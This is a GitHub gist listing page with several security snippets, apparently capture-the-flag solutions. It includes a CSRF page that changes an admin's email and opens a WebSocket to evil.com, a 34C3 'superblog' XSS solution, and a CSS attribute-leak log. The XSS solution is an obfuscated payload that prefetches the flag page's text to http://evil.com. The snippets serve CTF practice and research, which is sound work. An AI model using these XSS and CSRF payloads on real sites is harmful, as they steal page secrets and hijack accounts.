Skip to content

Instantly share code, notes, and snippets.

Avatar

Pepe Vila cgvwzq

View GitHub Profile
@cgvwzq
cgvwzq / source.js
Created Oct 5, 2019
nn9ed x-oracle-v0 source code
View source.js
const fs = require('fs');
const express = require('express');
const session = require('express-session')
const cookieParser = require('cookie-parser');
const { URL } = require('url');
const uuidv4 = require('uuid/v4');
const path = require('path');
const bot = require('./bot');
const crypto = require('crypto');
const mariadb = require('mariadb');
@cgvwzq
cgvwzq / js-lower-alpha-parent-dot.html
Last active May 24, 2019
Generate JS into only lowercase alphabet letters, parenthesis and dots.
View js-lower-alpha-parent-dot.html
<style>
textarea {
width: 100%;
height: 30%;
}
</style>
<textarea id="input">alert('xss')</textarea>
<textarea id="output"></textarea>
<br>
<label>Length: </label><span id="numchars"></span>
@cgvwzq
cgvwzq / output.log
Created Aug 18, 2018
Recursive CSS attribute leakeage
View output.log
[+] Server is listening on 5001
...pre-payoad:
...post-payoad:
...pre-payoad: d
...post-payoad: 3
...pre-payoad: d3
...post-payoad: d3
...pre-payoad: d3a
...post-payoad: 0d3
...pre-payoad: d3ad
@cgvwzq
cgvwzq / index.html
Created Feb 6, 2018
js md5 collision integrity check
View index.html
<!doctype html>
<meta charset=utf-8>
<script>
(function(){
let p = '66756e6374696f6e20776f6c6f6c6f2829207b0a2f2a2070616464696e6770616464696e6770616464696e6770616464696e202a2f0a6c65742078203d205b60a93b8c71cd270612671823b651adad9cdb3cd1d746c54f2911be40d107cc15e790e1a8be804d36484bcee114fe8f137bb71fb709c1a16d399884facf5936714b1fe4c9be4e2ec593c1df6e22d6ee0fc42198160b689c02f9a9c300c89b5f68c8d33530f89fc8721efb41cc3adc73008702d7c7373b70cbb75ae7575a6f7df566602c2f2a666a35374e4762304954714678656e6c6f374644766e41775a47464e346f6e4538535274443134766e3564776d79424b546d56496c6c4c706b4d2a2f6000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000005752ca3581b494dd996d5ddeab432a3bfb53bbcdb05dd34401241f1cf273e3c9812ecd67c66f2fb8f046e3cc1f5787921df10fc8423f626c6bef6f09947df69992d2ba0431422fbcc26dcdd16e4b6cbf198c3a5b12fa72b066932264a9afdbc8da7ba363f8ea1c70267c50992d0c9dee41000116dc523f4e61c37e208a9cf34602c2f2a39697a366c534166596d46786a48446e375246446e353875544
@cgvwzq
cgvwzq / index.html
Last active Jan 26, 2018
insomnihack'18 - Cool Storage Service web challenge
View index.html
<body>
<form action="http://css.teaser.insomnihack.ch/?page=profile" method="POST">
// change admin's email
<input type="text" name="email" value="wololo@coolmail.com">
<input type="text" name="csrf" value="">
<input type="text" name="change" value="Modify profile">
</form>
<iframe id="leakchar"></iframe>
<script>
const WS = "ws://evil.com:8000";
@cgvwzq
cgvwzq / solution.html
Created Dec 30, 2017
34c3 - superblog
View solution.html
XSS vector:
<link id=foo rel=import href=/flag(1|2)>
<script src="/feed?type=jsonp&cb=payload"></script>
<!-- superblog 1 - flag: 34C3_so_y0u_w3nt_4nd_learned_SOME_javascript_g00d_f0r_y0u -->
<script>
document.write`${Array.call`${atob`PA`}${`l`}${`i`}${`n`}${`k`}${atob`IA`}${`r`}${`e`}${`l`}${atob`PQ`}${atob`Ig`}${`p`}${`r`}${`e`}${`f`}${`e`}${`t`}${`c`}${`h`}${atob`Ig`}${atob`IA`}${`h`}${`r`}${`e`}${`f`}${atob`PQ`}${atob`Ig`}${`h`}${`t`}${`t`}${`p`}${atob`Og`}${atob`Lw`}${atob`Lw`}${`evil`}${atob`Lg`}${`com`}${atob`Og`}${atob`Lw`}${Math.random``}${`_`}${escape.call`${document.getElementsByTagName`link`.item``.import.body.innerText}`}${atob`Ig`}${atob`Pg`}`.join``}`,
</script>
<!-- superblog 2 - flag: 34C3_h3ncef0rth_peopl3_sh4ll_refer_t0_y0u_only_4s_th3_ES6+DOM_guru -->
You can’t perform that action at this time.